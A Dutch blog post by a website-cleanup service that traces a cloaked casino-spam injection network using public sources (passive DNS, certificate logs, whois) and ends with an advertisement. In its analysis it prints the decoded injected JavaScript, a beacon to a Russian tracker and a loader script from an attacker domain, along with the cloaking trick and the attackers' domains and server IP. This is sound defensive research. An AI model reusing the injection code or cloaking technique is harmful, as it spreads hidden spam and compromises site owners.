site:jouwdomein.nl casino te typen. Wil je weten wie erachter zit, dan kun je met legale open-bronnen — de payload ontcijferen, passieve DNS, Certificate Transparency, whois — de complete infrastructuur blootleggen. In dit artikel doe ik dat stap voor stap op een echt geval. De conclusie: het is geen scriptkiddie, maar een geautomatiseerde industrie. Staat het op jouw site? Ik ruim het op en dicht het gat.
De meeste gehackte sites die ik tegenkom zien er van buiten prima uit. Geen rare pop-ups, geen kapotte pagina's, niks. En tóch staat de site vol met verborgen pagina's over online casino's en medicijnen. De eigenaar weet van niets, de bezoeker ziet het nooit — alleen Google krijgt het te zien, en indexeert het netjes als jóuw content.
Bij een van mijn klanten was het niet anders. Eén verborgen casino-pagina, opgedoken in een routine-check. Ik had 'm kunnen weggooien en klaar. Maar ik wilde weten: wie zet dit erop, en hoe ver reikt het? Hieronder loop ik de hele backtrace door — allemaal met legale, openbare bronnen.
1. De hack die je zelf nooit ziet
De truc heet cloaking. De aanvaller toont zijn spam alléén aan zoekmachines, niet aan gewone bezoekers. Hij kijkt naar wie er langskomt: een echte browser krijgt de nette site, de Googlebot krijgt de casino-pagina. Daardoor blijft de eigenaar onwetend, terwijl de site z'n Google-reputatie langzaam verspeelt aan gokreclame. Dezelfde cloaking-truc zag ik eerder bij Chinese spam en Japanse SEO-spam — alleen de lading verschilt.
Om erdoorheen te prikken doe je je vóór als Google. Je haalt de pagina op met de User-Agent van de Googlebot én een Google-zoek-referer — en dan valt het masker:
# gewone bezoeker → de nette site
curl https://klantsite.nl/
# als Googlebot, met een Google-zoek-referer → de verborgen casino-pagina
curl -A "Googlebot/2.1" -e "https://google.com/search?q=casino" \
https://klantsite.nl/casino-bonus-2026/
2. De payload kraken
De geïnjecteerde code staat niet leesbaar in de pagina. Hij zit verstopt in een base64-blok — een muur van willekeurige tekens. Dat is bewust: een simpele zoekopdracht op "casino" vindt 'm zo niet. Maar base64 is geen versleuteling, alleen een vermomming. Decodeer je het, dan zie je precies wat de code doet:
# in de pagina, verstopt in een data:-URI:
<script src="data:text/javascript;base64,bmV3IEltYWdl…"></script>
# masker eraf:
$ echo "bmV3IEltYWdl…" | base64 -d
new Image().src = "//counter.yadro.ru/hit;leosomegames?r=" + document.referrer;
document.write('<script src="//lambercheesered.org/…">');
Twee dingen springen eruit: een aanroep naar een Russische tracker (counter.yadro.ru) die elke bezoeker telt, en een loader-domein dat de echte gok-content ophaalt. Dit is het hart van de handtekening.
3. De vingerafdruk isoleren
Nu zoek je wat op élk slachtoffer identiek is. Dát is de rode draad die honderden losse sites aan één bron koppelt. Drie dingen kwamen steeds terug:
- De tracker —
counter.yadro.ru/hit;leosomegames. Telt bezoekers en wijst meteen naar de herkomst. - Het loader-domein — o.a.
lambercheesered.org,kentuckyfriedsalmom.org,charbroiledburgers.org. Opvallend: de namen zijn stuk voor stuk vernoemd naar eten (kaas, gebakken zalm, burgers). De aanvaller wisselt telkens van domein, maar blijft binnen dat eten-thema — een handig herkenningspunt. - De payload — op elk slachtoffer exact hetzelfde base64-blok. Eén dader, één gereedschap.
4. Van vingerafdruk naar honderden slachtoffers
Nu draai je het om. Met dat loader-domein als zoekterm vind je elke site die het inlaadt. Twee methoden vullen elkaar aan:
- Google-dorks op de pagina-inhoud — zoeken op de vaste titels en paden die de kit achterlaat. Zo vond ik 373 Nederlandse sites met dezelfde verborgen spam.
- Broncode-zoekmachines zoals urlscan.io — die bewaren voor elke gescande pagina welke domeinen ze aanroepen. Zoek op het loader-domein, en de slachtoffers rollen eruit. Alleen al voor het oudste loader-domein stonden er honderden scans in, verspreid over de UK, Australië, Japan, Frankrijk, Duitsland en meer.
Daarmee werd meteen duidelijk dat dit geen puur Nederlands probleem is: de 373 NL-sites zijn het topje van een internationaal netwerk.
5. De muur — en de barst erin
Hier stokt het meestal. De tracker wijst naar een Russische teller, maar die statistieken zijn wachtwoord-beveiligd. En de loader-domeinen schuilen achter Cloudflare — vraag je waar de server staat, dan krijg je alleen een Cloudflare-adres terug. Een muur.
Behalve dat twee loaders slordig waren. Cloudflare verbergt je huidige IP, maar niet je verleden. Passieve-DNS-archieven bewaren elk IP-adres waarop een domein ooit heeft gestaan. En in de geschiedenis van één loader stond het adres van vóór het schild dichtklapte:
lambercheesered.org — historische A-records
2026-06-03 → nu 104.21.50.110 Cloudflare (schild)
2026-03-29 → 06-03 80.85.247.160 Servers Tech Fzco ← de echte server
Je ziet het kantelmoment zwart op wit: de server draaide bijna twee maanden kaal online, en dook op 3 juni 2026 achter Cloudflare onder.
6. Aankloppen bij de bron
Eén adres, geen schild meer ervoor: 80.85.247.160, een VPS in een Amsterdams datacenter. En het bijzondere: de server leeft nog. Dus klopte ik aan — netjes, alleen kijken wat-ie uit zichzelf teruggeeft:
$ curl -I http://80.85.247.160/
HTTP/1.1 200 OK
Server: nginx/1.28.2
$ openssl s_client -connect 80.85.247.160:443 -servername lambercheesered.org
subject=CN=lambercheesered.org
issuer=Let's Encrypt notBefore=28 mei 2026
$ curl -A "Googlebot" -e "google.com/search?q=casino" https://80.85.247.160/
HTTP/1.1 403 Forbidden ← cloakt óók hier
De criminele server draait nog, met een geldig certificaat voor het loader-domein — en weigert je zodra je je als Google voordoet. Precies dezelfde cloaking, nu bij de bron.
7. Geen incident — een onderneming die al zes jaar draait
Elk TLS-certificaat dat ooit is uitgegeven belandt in openbare Certificate Transparency-logs. Ik trok de complete cert-historie op, en die vertelt hoe oud en hoe geïndustrialiseerd dit is:
- Het anker-domein van dit netwerk is geregistreerd in mei 2020 — vijf jaar geleden.
- De loader-domeinen met dat eten-thema komen vanaf 2022 online.
- Om de ~60 dagen wordt er een verse cert aangevraagd, jaar in jaar uit, afwisselend via twee certificaat-autoriteiten. Volautomatisch.
En het anker-domein staat niet eens achter privacy-bescherming. De registratie noemt zowaar een naam en een adres — in Zuid-Afrika, en vrijwel zeker vervalst, maar het is wat ze zélf hebben ingevuld. Zulke slordigheidjes zijn precies de sporen waar de politie iets mee kan.
8. Het is geen eenling
Toen ik de slachtoffers groepeerde op wélke infrastructuur ze inladen, viel het kwartje. Het is niet één hacker. Het zijn meerdere aparte netwerken die dezelfde kwetsbare sites afgrazen — de een met casino's, de ander met nep-medicijnen, en soms zit één site door meerdere tegelijk onder. De herkomst van dit eerste netwerk laat zich laag voor laag uittekenen, met elke schakel bewust in een ander land:
Geregistreerd in Azië, verstopt via de VS, gehost in Amsterdam, gemeten in Rusland. Geen eenzame hacker op zolder, maar een geautomatiseerde industrie van spam-injectie.
Van één pagina tot een heel netwerk
Wat begon met één verborgen pagina op de site van één klant, bleek het topje van een operatie die al zes jaar draait, in tientallen landen, volledig geautomatiseerd. En het mooiste van dit soort speurwerk: je hebt er geen geheime hackertools voor nodig. Alles wat ik gebruikte — de payload decoderen, passieve DNS, Certificate Transparency, whois — is openbaar en gratis. Eén verborgen pagina, en genoeg nieuwsgierigheid om te blijven trekken aan het draadje.
De kern in drie punten:
- Cloaking laat een gehackte site normale inhoud tonen aan bezoekers en verborgen casino-spam aan Google — daardoor merk je het zelf niet.
- Met legale, openbare bronnen (payload-analyse, passieve DNS, Certificate Transparency en whois) leg je de complete infrastructuur bloot, tot aan de origin-server.
- Dit netwerk draait aantoonbaar al zes jaar, trof honderden sites in tientallen landen en is volledig geautomatiseerd — geen scriptkiddie, maar een industrie.
Staat het ook op jouw site?
Het venijn is dat je er zelf niks van merkt, terwijl Google die verborgen gok- en pillen-pagina's als jóuw content ziet. Controleren kost één minuut. Typ dit in Google, met je eigen domein:
site:jouwdomein.nl casino
site:jouwdomein.nl viagra
site:jouwdomein.nl anabolen
Zie je pagina's die je nooit hebt gemaakt? Dan is je site geïnfecteerd. Niet in paniek raken — maar ook niet negeren. De pagina's weghalen is stap één; het gat dichten waardoor ze binnenkwamen (meestal een verouderde plugin of een gestolen wachtwoord) is stap twee. Doe je alleen het eerste, dan staat het er over een week weer.
Liever laten opruimen?
Dit soort hacks grondig opruimen is precies wat ik dagelijks doe voor Nederlandse MKB-sites, zzp'ers en non-profits. Ik verwijder álle verstopplekken (niet alleen de zichtbare), spoor het toegangspunt op en gooi het dicht, en controleer daarna of Google de spam weer loslaat. Inclusief een korte rapportage van wat er aan de hand was en hoe het kon gebeuren.
Maak direct contact via wpts.nl of stuur een mail naar info@wpts.nl. De eerste diagnose is altijd gratis.